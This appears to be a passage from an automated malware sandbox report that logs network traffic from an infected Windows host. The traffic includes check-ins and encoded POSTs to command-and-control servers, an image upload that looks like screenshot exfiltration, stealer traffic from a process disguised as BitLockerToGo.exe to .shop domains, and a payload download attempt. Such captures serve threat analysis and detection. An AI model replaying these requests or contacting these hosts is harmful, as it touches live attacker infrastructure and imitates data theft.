Aug 31, 2024 15:45:11.609358072 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:45:11.609400988 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:45:11.609400988 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:45:11.609401941 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:45:11.609401941 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:12.976305962 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.5	49778	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:12.063015938 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:12.835354090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:12.837764025 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:13.094458103 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49779	185.215.113.19	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:12.116630077 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:12.968265057 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:12.974693060 CEST	309	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 35 35 41 33 34 46 33 45 37 34 34 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 43 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA613555A34F3E7442A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AC
Aug 31, 2024 15:45:13.341196060 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 31, 2024 15:45:13.370182991 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTEwMTQ= Host: 185.215.113.19 Content-Length: 91166 Cache-Control: no-cache
Aug 31, 2024 15:45:13.370182991 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 77 4d 54 51 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTEwMTQ=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:45:13.370182991 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:45:13.370182991 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:45:13.370182991 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:45:13.370250940 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:14.494281054 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	49780	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:12.408629894 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:13.159641981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:13.214665890 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:13.612804890 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49781	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:13.220942020 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:13.972850084 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:13.976341009 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:14.231817007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49782	185.215.113.19	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:13.642832994 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:14.535435915 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.5	49783	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:13.772977114 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:14.536196947 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49731	188.114.97.3	443	5900	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:33 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: femininedspzmhu.shop
2024-08-31 13:44:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-31 13:44:33 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k89eg6h8kv25ukljdle760up36; expires=Wed, 25 Dec 2024 07:31:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wBuiptlkFa1UVkq3K2n0Jq2wuyNafrOMV2pDqv130OWE6wDDW6ELz%2BpJpZ99Z2n9Ds4H9P5%2FvvWk6EzE4ZNX66zfBe3z2PgceSKNRzpzAeVE5Hx8mobim2afb4f5U9oGz19sBTNfSw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd74ba0e89729b-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 13:44:33 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-31 13:44:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49733	188.114.96.3	443	5900	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:34 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-08-31 13:44:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-31 13:44:35 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ub75din0f4v9pc7gcd0fosv0h4; expires=Wed, 25 Dec 2024 07:31:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FqIwEC5FvMfUE0iapRe%2FSr%2BrzzyiwBHHY1JYfG3ioJoysxhL%2FjGTeU79YF9TPKEtGkyw4c%2FZicFj24FhimnoMrKTkgxGhBKWIcpXSwvNR9aP4VzNbuyGrljtB004nlNTk2Gfbfo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd74c0cf1a186d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 13:44:35 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-31 13:44:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	188.114.97.3	443	5900	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:35 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: traineiwnqo.shop
2024-08-31 13:44:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-31 13:44:35 UTC	555	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUG9LxF%2BL3nBU7eEC%2BO%2F9P6tbnRBAtKkRDJXsvi7h01FBDMLpKd%2BVqQP9SvrPhSYc8LbKmWje%2FmdkDoCTEZl6I6tGQG9vUFgzdtxgZJy1Ta5PbKsN%2B8sqBAhYYk%2FPfr0dLZ%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd74c69dcc4401-EWR
2024-08-31 13:44:35 UTC	814	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-31 13:44:35 UTC	1369	IN	Data Raw: 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 Data Ascii: les/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('
2024-08-31 13:44:35 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6a 6e 76 4e 4e 67 46 51 75 43 45 54 66 4f 50 31 42 70 46 39 39 48 66 42 33 70 6f 4b 46 35 70 56 6a 58 2e 71 4d 74 59 75 54 47 6f 2d 31 37 32 35 31 31 31 38 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e Data Ascii: <input type="hidden" name="atok" value="jnvNNgFQuCETfOP1BpF99HfB3poKF5pVjX.qMtYuTGo-1725111875-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn
2024-08-31 13:44:35 UTC	853	IN	Data Raw: 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 Data Ascii: or sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflar
2024-08-31 13:44:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49736	188.114.97.3	443	5900	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:36 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=jnvNNgFQuCETfOP1BpF99HfB3poKF5pVjX.qMtYuTGo-1725111875-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 80 Host: traineiwnqo.shop
2024-08-31 13:44:36 UTC	80	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 6e 65 77 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63 Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--newnew&j=5c9b8674a630d9101b46733aa37f15ec
2024-08-31 13:44:36 UTC	796	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 13:44:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4rbck062cbmqp02218018e72he; expires=Wed, 25 Dec 2024 07:31:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3LES8MWCaSPkBHmKTb5hiPbxjhdHLg%2Bv1AYj2gV3X9iRelyBcQl7SFRik061LZGWoaEOJAoz8OMzfN%2FCt4k2g%2Ff55nHI6UO2Bhj41OUbj8fIzZ4pKgBbuRirxXwVQ85NXGEz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bbd74cc0cf8430d-EWR alt-svc: h3=":443"; ma=86400
2024-08-31 13:44:36 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-31 13:44:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49737	69.57.172.44	443	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 13:44:37 UTC	54	OUT	GET /storage/openvpn12.exe HTTP/1.1 Host: cgil.in
2024-08-31 13:44:37 UTC	256	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1238 date: Sat, 31 Aug 2024 13:44:37 GMT server: LiteSpeed vary: User-Agent
2024-08-31 13:44:37 UTC	1112	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s
